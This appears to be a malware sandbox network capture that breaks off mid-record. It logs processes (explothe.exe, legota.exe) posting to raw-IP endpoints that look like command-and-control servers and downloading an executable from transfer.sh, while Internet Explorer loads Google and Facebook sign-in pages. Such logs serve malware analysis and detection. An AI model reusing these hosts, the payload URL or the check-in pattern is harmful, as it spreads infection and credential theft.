                                                  Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
                                                  Cross-Origin-Resource-Policy: same-site
                                                  Content-Encoding: gzip
                                                  Server: ESF
                                                  X-XSS-Protection: 0
                                                  X-Content-Type-Options: nosniff
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  GET
                                                  https://accounts.google.com/favicon.ico
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  GET /favicon.ico HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: accounts.google.com
                                                  Connection: Keep-Alive
                                                  Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I
                                                  Response
                                                  HTTP/1.1 302 Moved Temporarily
                                                  Content-Type: text/html; charset=UTF-8
                                                  X-Frame-Options: DENY
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Location: https://www.google.com/favicon.ico
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                  Content-Security-Policy: script-src 'nonce-3eIFnbkGKDrM0tdw8pv4DQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                  Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                  Content-Encoding: gzip
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  POST
                                                  https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=c
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.141:443
                                                  Request
                                                  POST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=c HTTP/1.1
                                                  Accept: */*
                                                  X-Same-Domain: 1
                                                  x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                  x-goog-ext-391502476-jspb: ["S101681747:1696680166053313",null,null,"AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS"]
                                                  Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                  Referer: https://accounts.google.com/v3/signin/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: accounts.google.com
                                                  Content-Length: 164
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I; OTZ=7239603_56_56__56_
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: application/json; charset=utf-8
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                  Set-Cookie: __Host-GAPS=1:QFaHwjs9ga-wkO4VCW93ou4T_nMKPQ:DVaG1eu79sSL7fOr; Expires=Mon, 06-Oct-2025 12:02:48 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                  X-Content-Type-Options: nosniff
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
                                                  Cross-Origin-Resource-Policy: same-site
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                  Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
                                                  Content-Encoding: gzip
                                                  Server: ESF
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-fi
                                                  POST
                                                  http://77.91.124.1/theme/index.php
                                                  explothe.exe
                                                  Remote address:
                                                  77.91.124.1:80
                                                  Request
                                                  POST /theme/index.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: 77.91.124.1
                                                  Content-Length: 88
                                                  Cache-Control: no-cache
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:02:45 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 6
                                                  Content-Type: text/html; charset=UTF-8
                                                • flag-fi
                                                  POST
                                                  http://77.91.68.78/help/index.php
                                                  legota.exe
                                                  Remote address:
                                                  77.91.68.78:80
                                                  Request
                                                  POST /help/index.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: 77.91.68.78
                                                  Content-Length: 88
                                                  Cache-Control: no-cache
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:02:45 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Vary: Accept-Encoding
                                                  Content-Length: 88
                                                  Content-Type: text/html; charset=UTF-8
                                                • flag-fi
                                                  POST
                                                  http://77.91.68.78/help/index.php
                                                  legota.exe
                                                  Remote address:
                                                  77.91.68.78:80
                                                  Request
                                                  POST /help/index.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: 77.91.68.78
                                                  Content-Length: 31
                                                  Cache-Control: no-cache
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 3
                                                  Content-Type: text/html; charset=UTF-8
                                                • flag-us
                                                  DNS
                                                  transfer.sh
                                                  legota.exe
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  transfer.sh
                                                  IN A
                                                  Response
                                                  transfer.sh
                                                  IN A
                                                  144.76.136.153
                                                • flag-de
                                                  GET
                                                  https://transfer.sh/WOHjUAuTPg/pf1sbMGHARiKj7J.exe
                                                  legota.exe
                                                  Remote address:
                                                  144.76.136.153:443
                                                  Request
                                                  GET /WOHjUAuTPg/pf1sbMGHARiKj7J.exe HTTP/1.1
                                                  Host: transfer.sh
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Cache-Control: no-store
                                                  Connection: keep-alive
                                                  Content-Disposition: attachment; filename="pf1sbMGHARiKj7J.exe"
                                                  Content-Length: 606208
                                                  Content-Type: application/x-msdos-program
                                                  Retry-After: Sat, 07 Oct 2023 14:02:47 GMT
                                                  Server: Transfer.sh HTTP Server
                                                  Vary: Range, Referer, X-Decrypt-Password
                                                  X-Made-With: <3 by DutchCoders
                                                  X-Ratelimit-Key: 154.61.71.13
                                                  X-Ratelimit-Limit: 10
                                                  X-Ratelimit-Rate: 600
                                                  X-Ratelimit-Remaining: 9
                                                  X-Ratelimit-Reset: 1696680167
                                                  X-Remaining-Days: n/a
                                                  X-Remaining-Downloads: n/a
                                                  X-Served-By: Proudly served by DutchCoders
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                • flag-us
                                                  DNS
                                                  apps.identrust.com
                                                  legota.exe
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  apps.identrust.com
                                                  IN A
                                                  Response
                                                  apps.identrust.com
                                                  IN CNAME
                                                  identrust.edgesuite.net
                                                  identrust.edgesuite.net
                                                  IN CNAME
                                                  a1952.dscq.akamai.net
                                                  a1952.dscq.akamai.net
                                                  IN A
                                                  2.18.121.68
                                                  a1952.dscq.akamai.net
                                                  IN A
                                                  2.18.121.70
                                                • flag-us
                                                  GET
                                                  http://apps.identrust.com/roots/dstrootcax3.p7c
                                                  legota.exe
                                                  Remote address:
                                                  2.18.121.68:80
                                                  Request
                                                  GET /roots/dstrootcax3.p7c HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Microsoft-CryptoAPI/6.1
                                                  Host: apps.identrust.com
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  X-XSS-Protection: 1; mode=block
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-Content-Type-Options: nosniff
                                                  X-Robots-Tag: noindex
                                                  Referrer-Policy: same-origin
                                                  Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT
                                                  ETag: "37d-603761e33cf00"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 893
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: sameorigin
                                                  Content-Type: application/pkcs7-mime
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 07 Oct 2023 13:02:45 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:45 GMT
                                                  Connection: keep-alive
                                                • flag-us
                                                  DNS
                                                  www.facebook.com
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  www.facebook.com
                                                  IN A
                                                  Response
                                                  www.facebook.com
                                                  IN CNAME
                                                  star-mini.c10r.facebook.com
                                                  star-mini.c10r.facebook.com
                                                  IN A
                                                  157.240.247.35
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_card_image_2.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_card_image_2.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: wRZKtl/35CrbFpdeWSFrBg==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sat, 07 Oct 2023 13:26:04 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: bSEOEKbiWWyOXC7VRgPwDgIQ8MdQtTehvVdzlS5gAxWbQnbCKxzS/OXh/P7QeqdlX/Ai3XqSBVusxz4Y94bVpQ==
                                                  Date: Fri, 06 Oct 2023 13:26:04 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 21306
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_card_image_3.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_card_image_3.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: tjvKzjcx509sRQAttysmgw==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 04:54:18 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: vT+bFt6hK8XzyXRsG5H1PbgAEvLT/L04bbxLj4G2FYUut1j51S8V+hcJIwoWloqkjHbjo2MDFVJaXJaa5ZaUtw==
                                                  Date: Sat, 07 Oct 2023 04:54:18 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 35554
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/login
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /login HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: same-origin
                                                  cross-origin-opener-policy: unsafe-none
                                                  Pragma: no-cache
                                                  Cache-Control: private, no-cache, no-store, must-revalidate
                                                  Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: DENY
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  Content-Type: text/html; charset="utf-8"
                                                  X-FB-Debug: 4v8QWoB08tYmwahViPN5vJuq0MeiYPxtp+UXTuXHoe1XnJ4deArW2fYbyv1XaTgaBqbpZtIl+Qq+MMFNMpGL7Q==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_card_image_1.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_card_image_1.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: Nmnpiyrpc00QHVchkNDJDQ==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 03:00:01 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  origin-agent-cluster: ?0
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: O6mnc//N4agEHGoBW1iivkyJHPapsz43ryVHWY+87MTAxFplAeJvZPZeTYrDMpaufo6yRZW3En0CQqSrCSF7zg==
                                                  Date: Sat, 07 Oct 2023 03:00:01 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 22180
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_card_image_4.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_card_image_4.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: mXjbZp5JUjt62zr4DVYbGw==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 04:49:56 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: N40VusxJnHurhDBJJilj5gDFHs3tNvUY5eufpl1jfPQ+9Lpmif6JAYNnV7iKF0W9VTL1x8/m75F5AYyIAT8p9g==
                                                  Date: Sat, 07 Oct 2023 04:49:56 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 17083
                                                • flag-us
                                                  DNS
                                                  static.xx.fbcdn.net
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  static.xx.fbcdn.net
                                                  IN A
                                                  Response
                                                  static.xx.fbcdn.net
                                                  IN CNAME
                                                  scontent.xx.fbcdn.net
                                                  scontent.xx.fbcdn.net
                                                  IN A
                                                  157.240.201.15
                                                • flag-us
                                                  DNS
                                                  facebook.com
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  facebook.com
                                                  IN A
                                                  Response
                                                  facebook.com
                                                  IN A
                                                  157.240.201.35
                                                • flag-nl
                                                  GET
                                                  https://facebook.com/security/hsts-pixel.gif?c=3.2
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.35:443
                                                  Request
                                                  GET /security/hsts-pixel.gif?c=3.2 HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 302 Found
                                                  Location: https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  Access-Control-Allow-Origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  Content-Type: text/html; charset="utf-8"
                                                  X-FB-Debug: RKIN3z2tiwEPFS4O/3d77DWwPuCXwlNoHp+/t1PD+xJvYCgw1RZvsMTJKXqkQFspIifg5kwWw664TjEFmcoPdg==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 0
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/g6qk785LM34.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y9/l/0,cross/g6qk785LM34.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 19:41:37 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: JP/QalUbMzqe1yJU0o9DPA==
                                                  X-FB-Debug: 5a0MtHOEB563VdYr6MF7zobd1Ni2l/GVA2NjzLmnBYp0WZperxrq9S0ePECNNcQ0XeEG1Dy1apgmNBLikFpoyQ==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 4404
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 27 Sep 2024 02:17:45 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: NDlpijDrkamGO5A0S/KtZA==
                                                  X-FB-Debug: Kcp8VcRaoBe9WUuigSBY5RxiLnerWu5/EqR5JLZnM+PkpfWVys5H/oRMPytG+av1QtvnO6VqiQTc1wZecI61KA==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 299
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/8iBPf52GdU5.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yI/r/8iBPf52GdU5.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 27 Sep 2024 17:05:17 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: NScDESqbCowvTfZrxIUfFA==
                                                  X-FB-Debug: y2WLaDnIf5j014ys5bmjKVKFR6lGk1CocT1VH/qnHSK3jPQ/lEwVwK5INm67dYIlWp0HTqwHgPiFDaq8yp2JiA==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 9158
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/kg_LcWkMBGy.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yk/r/kg_LcWkMBGy.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
